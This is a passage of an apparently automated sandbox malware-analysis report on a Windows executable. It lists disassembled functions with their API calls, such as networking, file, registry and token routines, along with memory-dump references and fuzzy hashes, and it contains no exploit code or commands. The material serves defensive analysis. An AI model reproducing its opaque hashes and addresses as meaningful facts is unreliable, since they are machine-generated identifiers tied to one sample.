                                                                      • Instruction ID: 40729a4c9288b5c714d38545a5fe405ee0b393e91cf2288d9b1e8839169fea16
                                                                      • Opcode Fuzzy Hash: f42c9921eaffec9b3db4767562394c3833935ddb1cd0f87e92f3f11f49da3c52
                                                                      • Instruction Fuzzy Hash: A1216971E00109EBDB10DFA4C949BFEBBB9FF64344F198159E444AB241DB71AE05DB90
                                                                      Function 0053098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __setmode.LIBCMT ref: 005309AE
                                                                        • Part of subcall function 00515A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00577896,?,?,00000000), ref: 00515A2C
                                                                        • Part of subcall function 00515A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00577896,?,?,00000000,?,?), ref: 00515A50
                                                                      • _fprintf.LIBCMT ref: 005309E5
                                                                      • OutputDebugStringW.KERNEL32(?), ref: 00565DBB
                                                                        • Part of subcall function 00534AAA: _flsall.LIBCMT ref: 00534AC3
                                                                      • __setmode.LIBCMT ref: 00530A1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                      • String ID:
                                                                      • API String ID: 521402451-0
                                                                      • Opcode ID: 4a11cb2c4a6f37ca23e603a25161651bf1ffd50cc9aaea9589736cefd20b61b5
                                                                      • Instruction ID: fe11bf01dc6e8e713146eb3715bfcd152eda9c01464b46d4166aeb5da7885c6d
                                                                      • Opcode Fuzzy Hash: 4a11cb2c4a6f37ca23e603a25161651bf1ffd50cc9aaea9589736cefd20b61b5
                                                                      • Instruction Fuzzy Hash: 971105319442066FDB04B6B4AC4E9FE7F68BFC1320F544016F105571C2FE3069869BA1
                                                                      Function 00581767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005817A3
                                                                        • Part of subcall function 0058182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0058184C
                                                                        • Part of subcall function 0058182D: InternetCloseHandle.WININET(00000000), ref: 005818E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 1463438336-0
                                                                      • Opcode ID: 1519df8f396ced949d47cfdaa550630b69a3eed840996f6d9a4cd0642582140d
                                                                      • Instruction ID: 691270394d3dd4fcf5fb11a5e9df843c8ae82124c2733b994801e0438570c93d
                                                                      • Opcode Fuzzy Hash: 1519df8f396ced949d47cfdaa550630b69a3eed840996f6d9a4cd0642582140d
                                                                      • Instruction Fuzzy Hash: F6219535200A05BFDB126F609C42F7ABFADFF88711F10442AFD55E6550D771D812ABA4
                                                                      Function 00573A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,0059FAC0), ref: 00573A64
                                                                      • GetLastError.KERNEL32 ref: 00573A73
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00573A82
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0059FAC0), ref: 00573ADF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      • Opcode ID: f7aecbeb7225a03917e742e70e0d8a4878af8655b520073b538a8144b9716326
                                                                      • Instruction ID: db13650c15204292027994d8870d51ad711c71b96a5135b5ad958561b576107e
                                                                      • Opcode Fuzzy Hash: f7aecbeb7225a03917e742e70e0d8a4878af8655b520073b538a8144b9716326
                                                                      • Instruction Fuzzy Hash: 972176745082069F8710DF28D8468AA7FE4BE55374F148A19F49DC7291D731DE49EB42
                                                                      Function 005450E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00545101
                                                                        • Part of subcall function 0053571C: __FF_MSGBANNER.LIBCMT ref: 00535733
                                                                        • Part of subcall function 0053571C: __NMSG_WRITE.LIBCMT ref: 0053573A
                                                                        • Part of subcall function 0053571C: RtlAllocateHeap.NTDLL(00FF0000,00000000,00000001,00000000,?,?,?,00530DD3,?), ref: 0053575F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_free
                                                                      • String ID:
                                                                      • API String ID: 614378929-0
                                                                      • Opcode ID: 16495cd2156eebe805be546a400c9ba0dfaaab88326d9574d24783560df649eb
                                                                      • Instruction ID: 64442be135d363e41e7073c1b6b0b5d0563ac0a432293d81b0308b64a003c306
                                                                      • Opcode Fuzzy Hash: 16495cd2156eebe805be546a400c9ba0dfaaab88326d9574d24783560df649eb
                                                                      • Instruction Fuzzy Hash: 97110672900B17AFCB312F70AC49BAD3F98BF543A5F205D2AF98596152EF348940D790
                                                                      Function 00586369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00515A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00577896,?,?,00000000), ref: 00515A2C
                                                                        • Part of subcall function 00515A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00577896,?,?,00000000,?,?), ref: 00515A50
                                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00586399
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005863A4
                                                                      • _memmove.LIBCMT ref: 005863D1
                                                                      • inet_ntoa.WSOCK32(?), ref: 005863DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 1504782959-0
                                                                      • Opcode ID: 832ae764ac33ed0ea1a2c2507b5ffcc75f7541d6775960634a431f969b0fb13e
                                                                      • Instruction ID: 1dc5ef6cde4ebe63c0e673da8a3dee1696a621cdd506f4bc4e9c95b3bf7024da
                                                                      • Opcode Fuzzy Hash: 832ae764ac33ed0ea1a2c2507b5ffcc75f7541d6775960634a431f969b0fb13e
                                                                      • Instruction Fuzzy Hash: 8811513150010AEFCB00FBA4DD9ACEE7BB8BF98310B144065F505B7161EB309E54DB61
                                                                      Function 00568B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00568B61
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00568B73
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00568B89
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00568BA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 05eb4a4d0ef932a58bb7f2125ddb67ba579ffebcdd5466102c80f58ee83a3302
                                                                      • Instruction ID: 897d47e48d62975a413a4863032529e071e435cc6f595e17467780cf4503d76e
                                                                      • Opcode Fuzzy Hash: 05eb4a4d0ef932a58bb7f2125ddb67ba579ffebcdd5466102c80f58ee83a3302
                                                                      • Instruction Fuzzy Hash: B2111C79901218FFDB11DF95CC85FADBB74FB48710F204195E904B7250DA716E11DB94
                                                                      Function 00511290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 005112D8
                                                                      • GetClientRect.USER32(?,?), ref: 0054B5FB
                                                                      • GetCursorPos.USER32(?), ref: 0054B605
                                                                      • ScreenToClient.USER32(?,?), ref: 0054B610
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 4127811313-0
                                                                      • Opcode ID: 4a009659b7da74352e13c607e026e3961b1b231d378d92b229deae25932d31ee
                                                                      • Instruction ID: 9ef9438dbf9ab5d6ef0a162b376d8f4524b6344c62bf057a0ff5f7a984167607
                                                                      • Opcode Fuzzy Hash: 4a009659b7da74352e13c607e026e3961b1b231d378d92b229deae25932d31ee
                                                                      • Instruction Fuzzy Hash: A311BF3950041AEFDF10DF99C8899FE7BB8FB45301F100892FA11E3140C730BA959BA9
                                                                      Function 0056D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0056D84D
                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0056D864
                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0056D879
                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0056D897
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      • Opcode ID: 9a302e5f26794f3fdb1b82a63d2cf8a07ef9f9a1bec9f41fbb68a7459325ebbb
                                                                      • Instruction ID: 0403100cd09a35bc8c46586a58ebec7693f8878a36825bd9bc6c7c00d0e66123
                                                                      • Opcode Fuzzy Hash: 9a302e5f26794f3fdb1b82a63d2cf8a07ef9f9a1bec9f41fbb68a7459325ebbb
                                                                      • Instruction Fuzzy Hash: 55115E75B05304DBE7208F50DC0CF92BBBCFB00B00F10896AA516D7050D7B0E959ABB1
                                                                      Function 00546FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                      • Instruction ID: 460b687e610ecac83749b8def9003f508776496dfd98a9af27f6c20a3ddcdeeb
                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                      • Instruction Fuzzy Hash: 6A014B7244914EBBCF265E84DC09CEE3F62BB1C358B598415FA5858031D336D9B1AF81
                                                                      Function 0059B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 0059B2E4
                                                                      • ScreenToClient.USER32(?,?), ref: 0059B2FC
                                                                      • ScreenToClient.USER32(?,?), ref: 0059B320
                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0059B33B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                      • String ID:
                                                                      • API String ID: 357397906-0
                                                                      • Opcode ID: c662d5ce3b0599ec2f0667f7243b8cad8b557d634cd808c5095faa2454f096d1
                                                                      • Instruction ID: e9904db689d1dcf3b6609048cd9a7466c97521447dfa140ef741f896f3077529
                                                                      • Opcode Fuzzy Hash: c662d5ce3b0599ec2f0667f7243b8cad8b557d634cd808c5095faa2454f096d1
                                                                      • Instruction Fuzzy Hash: DF1143B9D00209EFDB41CFA9D9849EEBBB9FB18310F108166E914E3220D735AA659F51
                                                                      Function 00576BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00576BE6
                                                                        • Part of subcall function 005776C4: _memset.LIBCMT ref: 005776F9
                                                                      • _memmove.LIBCMT ref: 00576C09
                                                                      • _memset.LIBCMT ref: 00576C16
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00576C26
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                      • String ID:
                                                                      • API String ID: 48991266-0
                                                                      • Opcode ID: d7104effc11c9391e143323842fc40191bfde2ab9bc25bab1c47f2afdcdf54c2
                                                                      • Instruction ID: a0c6dd1405d8d130ddeaf798f5b023cc9bd79950d58c29b3b2b565c938f64116
                                                                      • Opcode Fuzzy Hash: d7104effc11c9391e143323842fc40191bfde2ab9bc25bab1c47f2afdcdf54c2
                                                                      • Instruction Fuzzy Hash: 13F0303A200100ABCF016F55EC89A4ABF29FF85321F04C061FE099E266C731A811DBB4
                                                                      Function 00512218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSysColor.USER32(00000008), ref: 00512231
                                                                      • SetTextColor.GDI32(?,000000FF), ref: 0051223B
                                                                      • SetBkMode.GDI32(?,00000001), ref: 00512250
                                                                      • GetStockObject.GDI32(00000005), ref: 00512258
                                                                      • GetWindowDC.USER32(?,00000000), ref: 0054BE83
                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0054BE90
                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0054BEA9
                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0054BEC2
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0054BEE2
                                                                      • ReleaseDC.USER32(?,00000000), ref: 0054BEED
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1946975507-0
                                                                      • Opcode ID: 00271e1bebf5bef2ae81a2a582c4a080026a7c4d4307ae0b6527ce7ed4c08c87
                                                                      • Instruction ID: 32a5a975f89b26b213fae9791ef013f6bb4c350dea7585b9f7f91b13a18e98df
                                                                      • Opcode Fuzzy Hash: 00271e1bebf5bef2ae81a2a582c4a080026a7c4d4307ae0b6527ce7ed4c08c87
                                                                      • Instruction Fuzzy Hash: 68E03031504144AAEB215F64EC0D7D83F10EB15336F118367FA69880E1877145A4EB52
                                                                      Function 00568712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 0056871B
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,005682E6), ref: 00568722
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005682E6), ref: 0056872F
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,005682E6), ref: 00568736
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      • Opcode ID: 8234494f59c3870f3e377ba6d790d18745c9a10f45cc14ba459e3bef0d1df8f8
                                                                      • Instruction ID: 2cb9027a7c8d9b81fc4d676e2fc1c1311fdeb5d8297b2fbd115fbe8c31c2e561
                                                                      • Opcode Fuzzy Hash: 8234494f59c3870f3e377ba6d790d18745c9a10f45cc14ba459e3bef0d1df8f8
                                                                      • Instruction Fuzzy Hash: 65E086366112119BDB205FB05D0DB563BACEF64792F164929B246CA040DA748459D750
                                                                      Function 00516240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %Z
                                                                      • API String ID: 0-2273115281
                                                                      • Opcode ID: bf695688be8786845d7430bf1b97ba1e536b670e9c7f60f6707054560a599db1
                                                                      • Instruction ID: 546d32a2c2d53fa87e452d776e5c76bdfc809169e9635b33c5d21447096592a2
                                                                      • Opcode Fuzzy Hash: bf695688be8786845d7430bf1b97ba1e536b670e9c7f60f6707054560a599db1
                                                                      • Instruction Fuzzy Hash: 18B1A07580010A9BEF24EF98C4899FEBFB9FF88310F104426E912A7191EB749EC5C791
                                                                      Function 0058AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __itow_s
                                                                      • String ID: xb]$xb]
                                                                      • API String ID: 3653519197-4042768884
                                                                      • Opcode ID: c8d084d17a509be15034553cfda56967e5e5e63d90d8ea5e2056bbae7db9ce20
                                                                      • Instruction ID: e6d9bb69c088277f08e5bbee76b4f4e07a23f5bba77ccc79e170d543219bc7d8
                                                                      • Opcode Fuzzy Hash: c8d084d17a509be15034553cfda56967e5e5e63d90d8ea5e2056bbae7db9ce20
                                                                      • Instruction Fuzzy Hash: F8B16074A0010AEBEB24EF54C895DAABFB9FF58300F14845AFD45AB251EB31E985CB50
                                                                      Function 0057AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0052FC86: _wcscpy.LIBCMT ref: 0052FCA9
                                                                        • Part of subcall function 00519837: __itow.LIBCMT ref: 00519862
                                                                        • Part of subcall function 00519837: __swprintf.LIBCMT ref: 005198AC
                                                                      • __wcsnicmp.LIBCMT ref: 0057B02D
